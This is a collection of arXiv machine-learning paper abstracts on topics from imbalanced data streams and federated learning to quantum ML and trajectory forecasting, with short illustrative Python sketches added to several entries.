    Class imbalance poses new challenges when it comes to classifying data streams. Many algorithms recently proposed in the literature tackle this problem using a variety of data-level, algorithm-level, and ensemble approaches. However, there is a lack of standardized and agreed-upon procedures and benchmarks on how to evaluate these algorithms. This work proposes a standardized, exhaustive, and comprehensive experimental framework to evaluate algorithms in a collection of diverse and challenging imbalanced data stream scenarios. The experimental study evaluates 24 state-of-the-art data streams algorithms on 515 imbalanced data streams that combine static and dynamic class imbalance ratios, instance-level difficulties, concept drift, real-world and semi-synthetic datasets in binary and multi-class scenarios. This leads to a large-scale experimental study comparing state-of-the-art classifiers in the data stream mining domain. We discuss the advantages and disadvantages of state-of-the-art classifiers in each of these scenarios and we provide general recommendations to end-users for selecting the best algorithms for imbalanced data streams. Additionally, we formulate open challenges and future directions for this domain. Our experimental framework is fully reproducible and easy to extend with new methods. This way, we propose a standardized approach to conducting experiments in imbalanced data streams that can be used by other researchers to create complete, trustworthy, and fair evaluation of newly proposed methods. Our experimental framework can be downloaded from https://github.com/canoalberto/imbalanced-streams.
    Unsupervised Conditional Slot Attention for Object Centric Learning. (arXiv:2307.09437v1 [cs.LG])
Extracting object-level representations for downstream reasoning tasks is an emerging area in AI. Learning object-centric representations in an unsupervised setting presents multiple challenges, a key one being binding an arbitrary number of object instances to a specialized object slot. Recent object-centric representation methods like Slot Attention utilize iterative attention to learn composable representations with dynamic inference-level binding but fail to achieve specialized slot-level binding. To address this, in this paper we propose Unsupervised Conditional Slot Attention using a novel Probabilistic Slot Dictionary (PSD). We define PSD with (i) abstract object-level property vectors as keys and (ii) parametric Gaussian distributions as the corresponding values. We demonstrate the benefits of the learnt specific object-level conditioning distributions in multiple downstream tasks, namely object discovery, compositional scene generation, and compositional visual reasoning. We show that our method provides scene composition capabilities and a significant boost in few-shot adaptability tasks of compositional visual reasoning, while performing similarly to or better than Slot Attention in object discovery tasks.
    Nonuniqueness and Convergence to Equivalent Solutions in Observer-based Inverse Reinforcement Learning. (arXiv:2210.16299v2 [eess.SY] UPDATED)
    A key challenge in solving the deterministic inverse reinforcement learning (IRL) problem online and in real-time is the existence of multiple solutions. Nonuniqueness necessitates the study of the notion of equivalent solutions, i.e., solutions that result in a different cost functional but same feedback matrix, and convergence to such solutions. While offline algorithms that result in convergence to equivalent solutions have been developed in the literature, online, real-time techniques that address nonuniqueness are not available. In this paper, a regularized history stack observer that converges to approximately equivalent solutions of the IRL problem is developed. Novel data-richness conditions are developed to facilitate the analysis and simulation results are provided to demonstrate the effectiveness of the developed technique.
    Automatic Differentiation for Inverse Problems with Applications in Quantum Transport. (arXiv:2307.09311v1 [cs.LG])
    A neural solver and differentiable simulation of the quantum transmitting boundary model is presented for the inverse quantum transport problem. The neural solver is used to engineer continuous transmission properties and the differentiable simulation is used to engineer current-voltage characteristics.
    Federated Learning for Computationally-Constrained Heterogeneous Devices: A Survey. (arXiv:2307.09182v1 [cs.LG])
With an increasing number of smart devices like internet of things (IoT) devices deployed in the field, offloading training of neural networks (NNs) to a central server becomes more and more infeasible. Recent efforts to improve users' privacy have led to on-device learning emerging as an alternative. However, a model trained only on a single device, using only local data, is unlikely to reach a high accuracy. Federated learning (FL) has been introduced as a solution, offering a privacy-preserving trade-off between communication overhead and model accuracy by sharing knowledge between devices without disclosing the devices' private data. The applicability and the benefit of applying baseline FL are, however, limited in many relevant use cases due to the heterogeneity present in such environments. In this survey, we outline the heterogeneity challenges FL has to overcome to be widely applicable in real-world applications. We especially focus on the aspect of computation heterogeneity among the participating devices and provide a comprehensive overview of recent works on heterogeneity-aware FL. We discuss two groups: works that adapt the NN architecture and works that approach heterogeneity on a system level, covering Federated Averaging (FedAvg), distillation, and split learning-based approaches, as well as synchronous and asynchronous aggregation schemes.
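The FedAvg aggregation step mentioned above can be sketched as a dataset-size-weighted mean of client parameters (a minimal sketch with flat parameter lists; names are illustrative).

```python
def fedavg(client_weights, client_sizes):
    """Federated Averaging: the server aggregates client model parameters as
    a weighted mean, weighted by each client's local dataset size. Model
    parameters are represented as flat lists of floats for simplicity."""
    total = sum(client_sizes)
    dim = len(client_weights[0])
    return [sum(w[i] * n for w, n in zip(client_weights, client_sizes)) / total
            for i in range(dim)]

# Two clients with unequal data: the larger client dominates the average.
avg = fedavg([[1.0, 0.0], [0.0, 1.0]], client_sizes=[3, 1])
# avg == [0.75, 0.25]
```

Heterogeneity-aware variants surveyed in the paper modify what each client trains (e.g., sub-architectures, distilled students) before an aggregation step of this general shape.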
    Inverse Optimization for Routing Problems. (arXiv:2307.07357v1 [math.OC] CROSS LISTED)
    We propose a method for learning decision-makers' behavior in routing problems using Inverse Optimization (IO). The IO framework falls into the supervised learning category and builds on the premise that the target behavior is an optimizer of an unknown cost function. This cost function is to be learned through historical data, and in the context of routing problems, can be interpreted as the routing preferences of the decision-makers. In this view, the main contributions of this study are to propose an IO methodology with a hypothesis function, loss function, and stochastic first-order algorithm tailored to routing problems. We further test our IO approach in the Amazon Last Mile Routing Research Challenge, where the goal is to learn models that replicate the routing preferences of human drivers, using thousands of real-world routing examples. Our final IO-learned routing model achieves a score that ranks 2nd compared with the 48 models that qualified for the final round of the challenge. Our results showcase the flexibility and real-world potential of the proposed IO methodology to learn from decision-makers' decisions in routing problems.
    Optimistic Estimate Uncovers the Potential of Nonlinear Models. (arXiv:2307.08921v1 [cs.LG])
    We propose an optimistic estimate to evaluate the best possible fitting performance of nonlinear models. It yields an optimistic sample size that quantifies the smallest possible sample size to fit/recover a target function using a nonlinear model. We estimate the optimistic sample sizes for matrix factorization models, deep models, and deep neural networks (DNNs) with fully-connected or convolutional architecture. For each nonlinear model, our estimates predict a specific subset of targets that can be fitted at overparameterization, which are confirmed by our experiments. Our optimistic estimate reveals two special properties of the DNN models -- free expressiveness in width and costly expressiveness in connection. These properties suggest the following architecture design principles of DNNs: (i) feel free to add neurons/kernels; (ii) restrain from connecting neurons. Overall, our optimistic estimate theoretically unveils the vast potential of nonlinear models in fitting at overparameterization. Based on this framework, we anticipate gaining a deeper understanding of how and why numerous nonlinear models such as DNNs can effectively realize their potential in practice in the near future.
    A benchmark of categorical encoders for binary classification. (arXiv:2307.09191v1 [cs.LG])
    Categorical encoders transform categorical features into numerical representations that are indispensable for a wide range of machine learning models. Existing encoder benchmark studies lack generalizability because of their limited choice of (1) encoders, (2) experimental factors, and (3) datasets. Additionally, inconsistencies arise from the adoption of varying aggregation strategies. This paper is the most comprehensive benchmark of categorical encoders to date, including an extensive evaluation of 32 configurations of encoders from diverse families, with 36 combinations of experimental factors, and on 50 datasets. The study shows the profound influence of dataset selection, experimental factors, and aggregation strategies on the benchmark's conclusions -- aspects disregarded in previous encoder benchmarks.
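For a flavor of what such benchmarks compare, here is a minimal sketch of one encoder family, target (mean) encoding, which replaces each category with the mean target observed for it. This is an illustrative toy, not one of the paper's 32 benchmarked configurations:

```python
import numpy as np

def target_encode(categories, targets):
    """Map each category to the mean of the targets seen with it."""
    groups = {}
    for c, t in zip(categories, targets):
        groups.setdefault(c, []).append(t)
    means = {c: float(np.mean(v)) for c, v in groups.items()}
    encoded = np.array([means[c] for c in categories])
    return encoded, means

cats = ["a", "a", "b", "b", "b"]
y    = [1, 0, 1, 1, 0]
enc, mapping = target_encode(cats, y)
```

Real benchmarks must also handle unseen categories and leakage (e.g. via cross-fitting), which this sketch omits.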
    \nu-Flows: Conditional Neutrino Regression. (arXiv:2207.00664v7 [hep-ph] CROSS LISTED)
    We present $\nu$-Flows, a novel method for restricting the likelihood space of neutrino kinematics in high energy collider experiments using conditional normalizing flows and deep invertible neural networks. This method allows the recovery of the full neutrino momentum which is usually left as a free parameter and permits one to sample neutrino values under a learned conditional likelihood given event observations. We demonstrate the success of $\nu$-Flows in a case study by applying it to simulated semileptonic $t\bar{t}$ events and show that it can lead to more accurate momentum reconstruction, particularly of the longitudinal coordinate. We also show that this has direct benefits in a downstream task of jet association, leading to an improvement of up to a factor of 1.41 compared to conventional methods.
    An Alternative to Variance: Gini Deviation for Risk-averse Policy Gradient. (arXiv:2307.08873v1 [cs.LG])
    Restricting the variance of a policy's return is a popular choice in risk-averse Reinforcement Learning (RL) due to its clear mathematical definition and easy interpretability. Traditional methods directly restrict the total return variance. Recent methods restrict the per-step reward variance as a proxy. We thoroughly examine the limitations of these variance-based methods, such as sensitivity to numerical scale and hindering of policy learning, and propose to use an alternative risk measure, Gini deviation, as a substitute. We study various properties of this new risk measure and derive a policy gradient algorithm to minimize it. Empirical evaluation in domains where risk-aversion can be clearly defined shows that our algorithm can mitigate the limitations of variance-based risk measures and achieves high return with low risk in terms of variance and Gini deviation when others fail to learn a reasonable policy.
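For intuition, Gini deviation can be estimated from a sample of returns; under one common definition it is half the mean absolute difference between two i.i.d. draws (the paper's exact estimator may differ):

```python
import numpy as np

def gini_deviation(returns):
    """Half the mean absolute pairwise difference (one common definition).

    Includes i == j pairs, whose contribution is zero.
    """
    x = np.asarray(returns, dtype=float)
    return np.abs(x[:, None] - x[None, :]).mean() / 2.0

gd = gini_deviation([1.0, 3.0])  # pairwise |diffs|: 0, 2, 2, 0
```

Unlike variance, this measure scales linearly with the returns, which is one reason it is less sensitive to numerical scale.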
    Towards Accelerating Benders Decomposition via Reinforcement Learning Surrogate Models. (arXiv:2307.08816v1 [cs.LG])
    Stochastic optimization (SO) attempts to offer optimal decisions in the presence of uncertainty. Often, the classical formulation of these problems becomes intractable due to (a) the number of scenarios required to capture the uncertainty and (b) the discrete nature of real-world planning problems. To overcome these tractability issues, practitioners turn to decomposition methods that divide the problem into smaller, more tractable sub-problems. The focal decomposition method of this paper is Benders decomposition (BD), which decomposes stochastic optimization problems on the basis of scenario independence. In this paper we propose a method of accelerating BD with the aid of a surrogate model in place of an NP-hard integer master problem. Through the acceleration method we observe 30% faster average convergence when compared to other accelerated BD implementations. We introduce a reinforcement learning agent as a surrogate and demonstrate how it can be used to solve a stochastic inventory management problem.
    GraphCL-DTA: a graph contrastive learning with molecular semantics for drug-target binding affinity prediction. (arXiv:2307.08989v1 [cs.LG])
    Drug-target binding affinity prediction plays an important role in the early stages of drug discovery, as it can infer the strength of interactions between new drugs and new targets. However, the performance of previous computational models is limited by the following drawbacks. The learning of drug representation relies only on supervised data, without taking into account the information contained in the molecular graph itself. Moreover, most previous studies tended to design complicated representation learning modules, while uniformity, which is used to measure representation quality, is ignored. In this study, we propose GraphCL-DTA, a graph contrastive learning method with molecular semantics for drug-target binding affinity prediction. In GraphCL-DTA, we design a graph contrastive learning framework for molecular graphs to learn drug representations, so that the semantics of molecular graphs are preserved. Through this graph contrastive framework, a more essential and effective drug representation can be learned without additional supervised data. Next, we design a new loss function that can be directly used to smoothly adjust the uniformity of drug and target representations. By directly optimizing the uniformity of representations, the representation quality of drugs and targets can be improved. The effectiveness of the above innovative elements is verified on two real datasets, KIBA and Davis. The excellent performance of GraphCL-DTA on these datasets suggests its superiority to state-of-the-art models.
    Machine Learning Meets Mental Training -- A Proof of Concept Applied to Memory Sports. (arXiv:2307.08712v1 [cs.LG])
    This work aims to combine machine learning and mental training by presenting a practical application of the former to the particular form of the latter that is the art of memory, taken in its competitive version called "Memory Sports". Such a fusion, on the one hand, strives to raise awareness about both realms, while on the other it seeks to encourage research in this mixed field as a way to, ultimately, drive forward the development of this seemingly underestimated sport.
    From random-walks to graph-sprints: a low-latency node embedding framework on continuous-time dynamic graphs. (arXiv:2307.08433v2 [cs.LG] UPDATED)
    Many real-world datasets have an underlying dynamic graph structure, where entities and their interactions evolve over time. Machine learning models should consider these dynamics in order to harness their full potential in downstream tasks. Previous approaches for graph representation learning have focused on either sampling k-hop neighborhoods, akin to breadth-first search, or random walks, akin to depth-first search. However, these methods are computationally expensive and unsuitable for real-time, low-latency inference on dynamic graphs. To overcome these limitations, we propose graph-sprints, a general-purpose feature extraction framework for continuous-time dynamic graphs (CTDGs) that has low latency and is competitive with state-of-the-art, higher-latency models. To achieve this, a streaming, low-latency approximation to the random-walk based features is proposed. In our framework, time-aware node embeddings summarizing multi-hop information are computed using only single-hop operations on the incoming edges. We evaluate our proposed approach on three open-source datasets and two in-house datasets, and compare with three state-of-the-art algorithms (TGN-attn, TGN-ID, Jodie). We demonstrate that our graph-sprints features, combined with a machine learning classifier, achieve competitive performance (outperforming all baselines for the node classification tasks on five datasets). Simultaneously, graph-sprints significantly reduce inference latencies, achieving close to an order of magnitude speed-up in our experimental setting.
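The single-hop streaming idea can be caricatured as an exponential-moving-average update of a node's state on each incoming edge, so no walk simulation is needed at inference time. A toy sketch with hypothetical names, not the authors' implementation:

```python
import numpy as np

def stream_update(state, src_feat, alpha=0.5):
    """Single-hop streaming update on one incoming edge.

    The destination node's summary is a decayed blend of its previous
    summary and the source node's features, so multi-hop information
    accumulates over the edge stream without ever simulating walks.
    """
    return alpha * state + (1.0 - alpha) * src_feat

# Toy stream of two edges arriving at node v
v = np.zeros(2)
for src in [np.array([1.0, 0.0]), np.array([0.0, 1.0])]:
    v = stream_update(v, src)
```

Each update is O(d) in the embedding dimension, independent of graph size, which is where the latency advantage over walk-based features comes from.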
    EigenTrajectory: Low-Rank Descriptors for Multi-Modal Trajectory Forecasting. (arXiv:2307.09306v1 [cs.CV])
    Capturing high-dimensional social interactions and feasible futures is essential for predicting trajectories. To address this complex nature, several attempts have been devoted to reducing the dimensionality of the output variables via parametric curve fitting such as the B\'ezier curve and B-spline function. However, these functions, which originate in computer graphics fields, are not suitable to account for socially acceptable human dynamics. In this paper, we present EigenTrajectory ($\mathbb{ET}$), a trajectory prediction approach that uses a novel trajectory descriptor to form a compact space, known here as $\mathbb{ET}$ space, in place of Euclidean space, for representing pedestrian movements. We first reduce the complexity of the trajectory descriptor via a low-rank approximation. We transform the pedestrians' history paths into our $\mathbb{ET}$ space represented by spatio-temporal principal components, and feed them into off-the-shelf trajectory forecasting models. The inputs and outputs of the models as well as social interactions are all gathered and aggregated in the corresponding $\mathbb{ET}$ space. Lastly, we propose a trajectory anchor-based refinement method to cover all possible futures in the proposed $\mathbb{ET}$ space. Extensive experiments demonstrate that our EigenTrajectory predictor can significantly improve both the prediction accuracy and reliability of existing trajectory forecasting models on public benchmarks, indicating that the proposed descriptor is suited to represent pedestrian behaviors. Code is publicly available at https://github.com/inhwanbae/EigenTrajectory .
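The low-rank descriptor step can be sketched with a plain SVD: stack flattened trajectories into a matrix, keep the top-k right singular vectors as the basis of the compact space, and project paths into coefficients. This is a generic sketch on assumed toy data, not the authors' $\mathbb{ET}$ pipeline:

```python
import numpy as np

rng = np.random.default_rng(0)
# 100 toy trajectories, each 12 timesteps of (x, y), flattened to 24 dims
trajs = rng.normal(size=(100, 24))

# Low-rank basis from the SVD of the trajectory matrix
k = 4
U, S, Vt = np.linalg.svd(trajs, full_matrices=False)
basis = Vt[:k]            # (k, 24): principal directions of motion

coeffs = trajs @ basis.T  # compact k-dim descriptor of each trajectory
recon  = coeffs @ basis   # map descriptors back to Euclidean space
```

A forecasting model operating on `coeffs` predicts k numbers per trajectory instead of 24, which is the dimensionality reduction the paper exploits.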
    Resource frugal optimizer for quantum machine learning. (arXiv:2211.04965v2 [quant-ph] UPDATED)
    Quantum-enhanced data science, also known as quantum machine learning (QML), is of growing interest as an application of near-term quantum computers. Variational QML algorithms have the potential to solve practical problems on real hardware, particularly when involving quantum data. However, training these algorithms can be challenging and calls for tailored optimization procedures. Specifically, QML applications can require a large shot-count overhead due to the large datasets involved. In this work, we advocate for simultaneous random sampling over both the dataset as well as the measurement operators that define the loss function. We consider a highly general loss function that encompasses many QML applications, and we show how to construct an unbiased estimator of its gradient. This allows us to propose a shot-frugal gradient descent optimizer called Refoqus (REsource Frugal Optimizer for QUantum Stochastic gradient descent). Our numerics indicate that Refoqus can save several orders of magnitude in shot cost, even relative to optimizers that sample over measurement operators alone.
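The core trick behind shot-frugal optimizers of this kind, an unbiased estimator built from random subsampling of a large sum, can be illustrated in miniature: draw a few terms uniformly, reweight by the total count, and the estimate is unbiased however few samples are used. A generic illustration, not the Refoqus loss itself:

```python
import numpy as np

def sampled_sum_estimator(values, n_draws, rng):
    """Unbiased estimate of sum(values) from a uniform subsample.

    Each draw is reweighted by len(values), so the expectation of the
    estimator equals the exact sum regardless of n_draws.
    """
    values = np.asarray(values, dtype=float)
    idx = rng.integers(0, len(values), size=n_draws)
    return values[idx].mean() * len(values)

rng = np.random.default_rng(0)
vals = np.arange(10.0)  # exact sum is 45
# Averaging many cheap 5-draw estimates converges to the exact sum
est = np.mean([sampled_sum_estimator(vals, 5, rng) for _ in range(20000)])
```

In the QML setting the "terms" are (data point, measurement operator) pairs and each draw costs quantum shots, which is why an unbiased few-draw estimator translates directly into shot savings.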
    Reduced Kernel Dictionary Learning. (arXiv:2307.08798v1 [eess.SP])
    In this paper we present new algorithms for training reduced-size nonlinear representations in the Kernel Dictionary Learning (KDL) problem. Standard KDL has the drawback of a large size of the kernel matrix when the data set is large. There are several ways of reducing the kernel size, notably Nystr\"om sampling. We propose here a method more in the spirit of dictionary learning, where the kernel vectors are obtained with a trained sparse representation of the input signals. Moreover, we optimize directly the kernel vectors in the KDL process, using gradient descent steps. We show with three data sets that our algorithms are able to provide better representations, despite using a small number of kernel vectors, and also decrease the execution time with respect to KDL.
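For context, the Nyström baseline mentioned above approximates a large kernel matrix from a small set of landmark columns, K ≈ K_nm K_mm⁺ K_nmᵀ. A minimal sketch with an RBF kernel on toy data (hypothetical names, not the paper's algorithm):

```python
import numpy as np

def rbf(X, Y, gamma=1.0):
    """Gaussian (RBF) kernel matrix between rows of X and rows of Y."""
    d2 = ((X[:, None, :] - Y[None, :, :]) ** 2).sum(-1)
    return np.exp(-gamma * d2)

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 3))
landmarks = X[:10]                # m << n landmark points

K_nm = rbf(X, landmarks)          # (n, m) cross-kernel
K_mm = rbf(landmarks, landmarks)  # (m, m) landmark kernel
K_approx = K_nm @ np.linalg.pinv(K_mm) @ K_nm.T  # Nystrom approximation
K_full = rbf(X, X)                # exact (n, n) kernel, for comparison
```

The approximation is exact on the landmark block and degrades gracefully elsewhere; storage drops from O(n²) to O(nm).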
    Multi-Modal Discussion Transformer: Integrating Text, Images and Graph Transformers to Detect Hate Speech on Social Media. (arXiv:2307.09312v1 [cs.CL])
    We present the Multi-Modal Discussion Transformer (mDT), a novel multi-modal graph-based transformer model for detecting hate speech in online social networks. In contrast to traditional text-only methods, our approach to labelling a comment as hate speech centers around the holistic analysis of text and images. This is done by leveraging graph transformers to capture the contextual relationships in the entire discussion that surrounds a comment, with interwoven fusion layers to combine text and image embeddings instead of processing different modalities separately. We compare the performance of our model to baselines that only process text; we also conduct extensive ablation studies. We conclude with future work for multimodal solutions to deliver social value in online contexts, arguing that capturing a holistic view of a conversation greatly advances the effort to detect anti-social behavior.
    Forecasting the steam mass flow in a powerplant using the parallel hybrid network. (arXiv:2307.09483v1 [cs.LG])
    Efficient and sustainable power generation is a crucial concern in the energy sector. In particular, thermal power plants grapple with accurately predicting steam mass flow, which is crucial for operational efficiency and cost reduction. In this study, we use a parallel hybrid neural network architecture that combines a parametrized quantum circuit and a conventional feed-forward neural network specifically designed for time-series prediction in industrial settings to enhance predictions of steam mass flow 15 minutes into the future. Our results show that the parallel hybrid model outperforms standalone classical and quantum models, achieving more than 5.7 and 4.9 times lower mean squared error (MSE) loss on the test set after training compared to pure classical and pure quantum networks, respectively. Furthermore, the hybrid model demonstrates smaller relative errors between the ground truth and the model predictions on the test set, up to 2 times better than the pure classical model. These findings contribute to the broader scientific understanding of how integrating quantum and classical machine learning techniques can be applied to real-world challenges faced by the energy sector, ultimately leading to optimized power plant operations.
    Implicit Anatomical Rendering for Medical Image Segmentation with Stochastic Experts. (arXiv:2304.03209v2 [cs.CV] UPDATED)
    Integrating high-level semantically correlated contents and low-level anatomical features is of central importance in medical image segmentation. Towards this end, recent deep learning-based medical segmentation methods have shown great promise in better modeling such information. However, convolution operators for medical segmentation typically operate on regular grids, which inherently blur the high-frequency regions, i.e., boundary regions. In this work, we propose MORSE, a generic implicit neural rendering framework designed at an anatomical level to assist learning in medical image segmentation. Our method is motivated by the fact that implicit neural representation has been shown to be more effective in fitting complex signals and solving computer graphics problems than discrete grid-based representation. The core of our approach is to formulate medical image segmentation as a rendering problem in an end-to-end manner. Specifically, we continuously align the coarse segmentation prediction with the ambiguous coordinate-based point representations and aggregate these features to adaptively refine the boundary region. To optimize multi-scale pixel-level features in parallel, we leverage the idea from Mixture-of-Expert (MoE) to design and train our MORSE with a stochastic gating mechanism. Our experiments demonstrate that MORSE can work well with different medical segmentation backbones, consistently achieving competitive performance improvements in both 2D and 3D supervised medical segmentation methods. We also theoretically analyze the superiority of MORSE.
    Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces. (arXiv:2307.09057v1 [math.OC])
    This paper presents a framework for computing the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, where the discrepancy is the squared Euclidean norm. The Gromov-Wasserstein problem is a generalization of the optimal transport problem that finds the assignment between two sets preserving pairwise distances as much as possible. This can be used to quantify the similarity between two formations or shapes, a common problem in AI and machine learning. The problem can be formulated as a Quadratic Assignment Problem (QAP), which is in general computationally intractable even for small problems. Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank. The method scales well with the number of points, and it can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem which is of particular interest in computational biology.
    Variational Monte Carlo on a Budget -- Fine-tuning pre-trained Neural Wavefunctions. (arXiv:2307.09337v1 [physics.chem-ph])
    Obtaining accurate solutions to the Schr\"odinger equation is the key challenge in computational quantum chemistry. Deep-learning-based Variational Monte Carlo (DL-VMC) has recently outperformed conventional approaches in terms of accuracy, but only at large computational cost. Whereas in many domains models are trained once and subsequently applied for inference, accurate DL-VMC so far requires a full optimization for every new problem instance, consuming thousands of GPU hours even for small molecules. We instead propose a DL-VMC model which has been pre-trained using self-supervised wavefunction optimization on a large and chemically diverse set of molecules. Applying this model to new molecules without any optimization yields wavefunctions and absolute energies that outperform established methods such as CCSD(T)-2Z. To obtain accurate relative energies, only few fine-tuning steps of this base model are required. We accomplish this with a fully end-to-end machine-learned model, consisting of an improved geometry embedding architecture and an existing SE(3)-equivariant model to represent molecular orbitals. Combining this architecture with continuous sampling of geometries, we improve zero-shot accuracy by two orders of magnitude compared to the state of the art. We extensively evaluate the accuracy, scalability and limitations of our base model on a wide variety of test systems.
    Learning Dynamic Attribute-factored World Models for Efficient Multi-object Reinforcement Learning. (arXiv:2307.09205v1 [cs.LG])
    In many reinforcement learning tasks, the agent has to learn to interact with many objects of different types and generalize to unseen combinations and numbers of objects. Often a task is a composition of previously learned tasks (e.g. block stacking). These are examples of compositional generalization, in which we compose object-centric representations to solve complex tasks. Recent works have shown the benefits of object-factored representations and hierarchical abstractions for improving sample efficiency in these settings. On the other hand, these methods do not fully exploit the benefits of factorization in terms of object attributes. In this paper, we address this opportunity and introduce the Dynamic Attribute FacTored RL (DAFT-RL) framework. In DAFT-RL, we leverage object-centric representation learning to extract objects from visual inputs. We learn to classify them in classes and infer their latent parameters. For each class of object, we learn a class template graph that describes how the dynamics and reward of an object of this class factorize according to its attributes. We also learn an interaction pattern graph that describes how objects of different classes interact with each other at the attribute level. Through these graphs and a dynamic interaction graph that models the interactions between objects, we can learn a policy that can then be directly applied in a new environment by just estimating the interactions and latent parameters. We evaluate DAFT-RL in three benchmark datasets and show our framework outperforms the state-of-the-art in generalizing across unseen objects with varying attributes and latent parameters, as well as in the composition of previously learned tasks.
    A Comprehensive Survey of Forgetting in Deep Learning Beyond Continual Learning. (arXiv:2307.09218v1 [cs.LG])
    Forgetting refers to the loss or deterioration of previously acquired information or knowledge. While the existing surveys on forgetting have primarily focused on continual learning, forgetting is a prevalent phenomenon observed in various other research domains within deep learning. Forgetting manifests in research fields such as generative models due to generator shifts, and federated learning due to heterogeneous data distributions across clients. Addressing forgetting encompasses several challenges, including balancing the retention of old task knowledge with fast learning of new tasks, managing task interference with conflicting goals, and preventing privacy leakage, etc. Moreover, most existing surveys on continual learning implicitly assume that forgetting is always harmful. In contrast, our survey argues that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios. By exploring forgetting in a broader context, we aim to present a more nuanced understanding of this phenomenon and highlight its potential advantages. Through this comprehensive survey, we aspire to uncover potential solutions by drawing upon ideas and approaches from various fields that have dealt with forgetting. By examining forgetting beyond its conventional boundaries, in future work, we hope to encourage the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications. A comprehensive list of papers about forgetting in various research fields is available at \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}.
    A Federated learning model for Electric Energy management using Blockchain Technology. (arXiv:2307.09080v1 [cs.LG])
    Energy shortfall and electricity load shedding are major problems in developing countries, caused mainly by poor management in the energy sector and reliance on non-renewable energy sources. Improved energy management and the use of renewable sources can be significant in resolving the energy crisis. It is necessary to increase the use of renewable energy sources (RESs) to meet the increasing energy demand driven by the high prices of fossil-fuel-based energy. Federated learning (FL) is an emerging technique in the field of artificial intelligence: it generates a global model at the server side by ensembling locally trained models from remote edge sites while preserving data privacy. The global model is used to predict energy demand to satisfy the needs of consumers. In this article, we propose a Blockchain-based secure distributed ledger for data transactions between prosumers and consumers to ensure transparency, traceability, and security. Furthermore, we propose a federated learning model to forecast the energy requirements of consumers and prosumers. Moreover, Blockchain is used to store excess energy data from prosumers for better management of energy between prosumers and the grid. Lastly, the experimental results reveal that renewable energy sources produced better and comparable results to other non-renewable energy resources.
    DeepMem: ML Models as storage channels and their (mis-)applications. (arXiv:2307.08811v1 [cs.LG])
    Machine learning (ML) models are overparameterized to support generality and avoid overfitting. Prior works have shown that these additional parameters can be used for both malicious (e.g., hiding a model covertly within a trained model) and beneficial purposes (e.g., watermarking a model). In this paper, we propose a novel information theoretic perspective of the problem; we consider the ML model as a storage channel with a capacity that increases with overparameterization. Specifically, we consider a sender that embeds arbitrary information in the model at training time, which can be extracted by a receiver with a black-box access to the deployed model. We derive an upper bound on the capacity of the channel based on the number of available parameters. We then explore black-box write and read primitives that allow the attacker to: (i) store data in an optimized way within the model by augmenting the training data at the transmitter side, and (ii) to read it by querying the model after it is deployed. We also analyze the detectability of the writing primitive and consider a new version of the problem which takes information storage covertness into account. Specifically, to obtain storage covertness, we introduce a new constraint such that the data augmentation used for the write primitives minimizes the distribution shift with the initial (baseline task) distribution. This constraint introduces a level of "interference" with the initial task, thereby limiting the channel's effective capacity. Therefore, we develop optimizations to improve the capacity in this case, including a novel ML-specific substitution based error correction protocol. We believe that the proposed modeling of the problem offers new tools to better understand and mitigate potential vulnerabilities of ML, especially in the context of increasingly large models.
    Towards Trustworthy Dataset Distillation. (arXiv:2307.09165v1 [cs.LG])
    Efficiency and trustworthiness are two eternal pursuits when applying deep learning in real-world applications. With regard to efficiency, dataset distillation (DD) endeavors to reduce training costs by distilling the large dataset into a tiny synthetic dataset. However, existing methods merely concentrate on in-distribution (InD) classification in a closed-world setting, disregarding out-of-distribution (OOD) samples. On the other hand, OOD detection aims to enhance models' trustworthiness, which is always inefficiently achieved in full-data settings. For the first time, we simultaneously consider both issues and propose a novel paradigm called Trustworthy Dataset Distillation (TrustDD). By distilling both InD samples and outliers, the condensed datasets are capable of training models competent in both InD classification and OOD detection. To alleviate the requirement of real outlier data and make OOD detection more practical, we further propose to corrupt InD samples to generate pseudo-outliers and introduce Pseudo-Outlier Exposure (POE). Comprehensive experiments on various settings demonstrate the effectiveness of TrustDD, and the proposed POE surpasses the state-of-the-art method Outlier Exposure (OE). Compared with the preceding DD, TrustDD is more trustworthy and applicable to real open-world scenarios. Our code will be publicly available.
    qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers. (arXiv:2307.09025v1 [quant-ph])
    We propose a general framework for decoding quantum error-correcting codes with generative modeling. The model utilizes autoregressive neural networks, specifically Transformers, to learn the joint probability of logical operators and syndromes. This training is in an unsupervised way, without the need for labeled training data, and is thus referred to as pre-training. After the pre-training, the model can efficiently compute the likelihood of logical operators for any given syndrome, using maximum likelihood decoding. It can directly generate the most-likely logical operators with computational complexity $\mathcal O(2k)$ in the number of logical qubits $k$, which is significantly better than the conventional maximum likelihood decoding algorithms that require $\mathcal O(4^k)$ computation. Based on the pre-trained model, we further propose a refinement step that more accurately estimates the likelihood of logical operators for a given syndrome by directly sampling the stabilizer operators. We perform numerical experiments on stabilizer codes with small code distances, using both depolarizing error models and error models with correlated noise. The results show that our approach provides significantly better decoding accuracy than the minimum weight perfect matching and belief-propagation-based algorithms. Our framework is general and can be applied to any error model and quantum codes with different topologies such as surface codes and quantum LDPC codes. Furthermore, it leverages the parallelization capabilities of GPUs, enabling simultaneous decoding of a large number of syndromes. Our approach sheds light on the efficient and accurate decoding of quantum error-correcting codes using generative artificial intelligence and modern computational power.
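The autoregressive likelihood at the heart of such decoders is just the chain rule, log p(x) = Σᵢ log p(xᵢ | x₍₍ᵢ₎₎). A toy sketch where a constant conditional stands in for a Transformer head (hypothetical names, not the qecGPT model):

```python
import numpy as np

def chain_rule_logprob(conditionals, bits):
    """log p(x) = sum_i log p(x_i | x_<i): the autoregressive factorization.

    conditionals: function mapping a prefix of bits to the probability
    that the next bit is 1 (in qecGPT this role is played by a Transformer).
    """
    logp = 0.0
    for i, b in enumerate(bits):
        p1 = conditionals(bits[:i])
        logp += np.log(p1 if b == 1 else 1.0 - p1)
    return logp

# Toy "model": next bit is 1 with probability 0.25, regardless of prefix
model = lambda prefix: 0.25
lp = chain_rule_logprob(model, [1, 0, 0])
```

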